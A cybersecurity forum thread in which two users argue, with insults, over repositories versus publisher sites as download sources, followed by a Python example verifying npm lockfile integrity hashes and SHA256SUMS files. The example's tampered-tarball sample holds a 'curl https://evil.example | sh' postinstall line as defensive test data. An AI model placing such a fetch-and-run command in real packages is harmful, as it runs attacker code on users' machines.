this post was submitted on 11 Apr 2026
1 points (100.0% liked)
cybersecurity
6049 readers
An umbrella community for all things cybersecurity / infosec. News, research, questions, are all welcome!
Community Rules
- Be kind
- Limit promotional activities
- Non-cybersecurity posts should be redirected to other communities within infosec.pub.
Enjoy!
founded 2 years ago
I'll just paste what I already wrote in hopes that your reading comprehension benefits from reading it a second time:
It literally doesn't matter if it's a publisher's site or not; users can't tell the difference, and it normalizes clicking links from a web search and running whatever software download the user sees first.
Again, louder this time, PACKAGE REPOSITORIES WILL ALWAYS BE OBJECTIVELY BETTER THAN RANDOM, UNTRUSTWORTHY WEBSITES.
Enjoy your ignorance and viruses
It doesn't matter if the software is delivered via a publisher's website or via a package repository if the supply chain has been compromised.
Clearly you're not aware of any recent cyber security news, or you'd know that the NPM package manager has suffered numerous attacks: https://www.bleepingcomputer.com/news/security/shai-hulud-malware-infects-500-npm-packages-leaks-secrets-on-github/
I guess you should trust NPM though, because it's a package manager!
You're just encouraging people to blindly use and trust repos with no understanding of the pros or cons, and without understanding how you can verify and test software yourself to reduce risk. This is an especially easy conversation when we talk closed source vs open source, and you failed to even bring that up.
Repeating nonsense claims instead of actually considering the entirely reasonable question only highlights that you're victim to the Dunning-Kruger effect.
You could have had a conversation and learned something from an actual cyber security professional and instead you've acted like a clown.
ItS nOt PeRfEcT sO iT cAnT bE bEtTeR
Cope.
hehehe seethe about it clown
You're so close to understanding. All of the flaws that come with supply chain attacks on repos also apply to random websites, plus even more flaws that repositories are not as susceptible to or that do not apply to repos at all.
Please quote me where I claimed that software repositories are less vulnerable to supply chain attacks.
You were wrong about something, constructed a strawman argument, and are grasping at straws to save face.
rAnDoM wEbSiTeS
That's what I thought.
Are you done speed-running through as many logical fallacies as possible? Multiple strawman arguments, no true Scotsman/appeal to authority, name calling/ad hominem. You wouldn't have to resort to these if you were just correct, like me.
Since you don't understand, you lowered the level of the conversation and now I'm going to continue on that level because you get what you deserve.
Ad hominem is a problem now, when you started by accusing me of lacking reading comprehension (aka stupidity) and then ignorance, in a field I am a professional in and have given reasoned and valid advice on?
In multiple replies you failed to even attempt to address the elephant in the room; that you have zero fucking clue how to verify that applications delivered from a repo aren't malicious.
Given a real world example you simply ignore it "but search results" eat shit you moron. The legitimate website was popped so "rAnDoM wEbSiTeS" aren't a factor or relevant.
JuSt TrUsT iT bRo - nonsense uttered by an absolute fuckwit
Addressing logical fallacies elevates the discussion to a place where it can actually be productive; it doesn't lower it.
It's not relevant because it applies to both random websites and code repositories equally. Again, please quote me where I claimed that code repositories are not susceptible to this.
You've demonstrated both of these, so it is just a statement of fact. "you moron", this you?
get ratioed fuckwit
Not you, but some advice(?).
Doesn't change that this ^ is a fact you can't refute, so I'm correct. Your entire argument is strawman arguing against claims that I've never made and name calling. You're basically just arguing with yourself. 🤷
You can't tell, after getting completely obliterated by downvotes and repeatedly rebutted, that you're the one in the weeds? Clueless much?
And yet my point was never refuted
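The thread above argues about whether a package repository or a publisher's website is the safer download channel, and one side asks how you would verify that what a repo delivers is not malicious. The following is an added example, not code from either commenter, showing the mechanical part of that verification for both channels: checking an npm-style lockfile `integrity` field (a Subresource Integrity string, `<algo>-<base64 digest>`) against fetched tarball bytes, and checking a file against a `sha256sum`-style SHAsums listing as published next to a download. The package name, tarball bytes and checksum file are constructed for this example. The caveat a practitioner wants is built into the example too: a pinned hash only proves you received the bytes you pinned; if a compromised maintainer publishes a new malicious version and the lockfile is regenerated to match it, the hash check passes, which is exactly how the Shai-Hulud-style compromise referenced in the thread propagates.

```python
import base64
import hashlib
import hmac

# Constructed sample data (hypothetical package "example-pkg"; these bytes
# are not a real tarball and the lockfile below is built from them).
TARBALL_GOOD = b"fake tarball contents for example-pkg@1.2.3\n"
TARBALL_TAMPERED = TARBALL_GOOD + b"postinstall: curl https://evil.example | sh\n"
# A later version that a compromised maintainer account could publish.
TARBALL_MALICIOUS_NEW_VERSION = b"fake tarball contents for example-pkg@1.2.4 with stealer\n"

SRI_ALGOS = ("sha256", "sha384", "sha512")


def sri(data: bytes, algo: str = "sha512") -> str:
    """Build an SRI string in the same shape as npm's lockfile `integrity` field."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def verify_sri(data: bytes, integrity: str) -> bool:
    """Check `data` against an SRI string using a constant-time comparison."""
    algo, sep, expected_b64 = integrity.partition("-")
    if not sep or algo not in SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm: {algo!r}")
    expected = base64.b64decode(expected_b64)
    actual = hashlib.new(algo, data).digest()
    return hmac.compare_digest(actual, expected)


def check_lockfile(lockfile: dict, fetched: dict) -> dict:
    """Map each lockfile package path to whether the fetched tarball matches its pin.

    `lockfile` mirrors the `packages` section of a package-lock.json v2/v3;
    `fetched` maps the same package paths to the tarball bytes actually downloaded.
    A package listed in the lockfile but not fetched is reported as False.
    """
    results = {}
    for path, entry in lockfile["packages"].items():
        data = fetched.get(path)
        results[path] = data is not None and verify_sri(data, entry["integrity"])
    return results


# Lockfile as it would look after the package was first reviewed and pinned.
LOCKFILE = {
    "packages": {
        "node_modules/example-pkg": {
            "version": "1.2.3",
            "integrity": sri(TARBALL_GOOD),
        }
    }
}


def verify_checksum_listing(data: bytes, listing: str, filename: str) -> bool:
    """Check `data` against a `sha256sum`-style listing ("<hex>  <filename>" per line).

    This is the publisher-website case: the SHA256SUMS file next to a download.
    Returns False if the filename is absent from the listing.
    """
    actual = hashlib.sha256(data).hexdigest()
    for line in listing.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue
        expected_hex, name = parts
        # sha256sum marks binary-mode entries with a leading '*'.
        if name.lstrip("*") == filename:
            return hmac.compare_digest(actual, expected_hex.lower())
    return False


# Constructed SHA256SUMS as a publisher might post beside installer-1.0.bin.
INSTALLER = b"fake installer bytes\n"
SHA256SUMS = f"{hashlib.sha256(INSTALLER).hexdigest()}  installer-1.0.bin\n"


if __name__ == "__main__":
    print(check_lockfile(LOCKFILE, {"node_modules/example-pkg": TARBALL_GOOD}))
    print(check_lockfile(LOCKFILE, {"node_modules/example-pkg": TARBALL_TAMPERED}))
    # Regenerating the lockfile for a malicious new version makes the pin match again:
    regenerated = {"packages": {"node_modules/example-pkg": {
        "version": "1.2.4", "integrity": sri(TARBALL_MALICIOUS_NEW_VERSION)}}}
    print(check_lockfile(regenerated, {"node_modules/example-pkg": TARBALL_MALICIOUS_NEW_VERSION}))
    print(verify_checksum_listing(INSTALLER, SHA256SUMS, "installer-1.0.bin"))
```

Both checks answer the same narrow question, "are these the bytes someone already vouched for?", regardless of whether the bytes came from a registry or a vendor page. What they cannot answer is whether the vouched-for version was benign, which is why a lockfile pin, a signature, or a checksum is only useful together with review of the version being pinned and a policy of not auto-regenerating pins when upstream publishes something new.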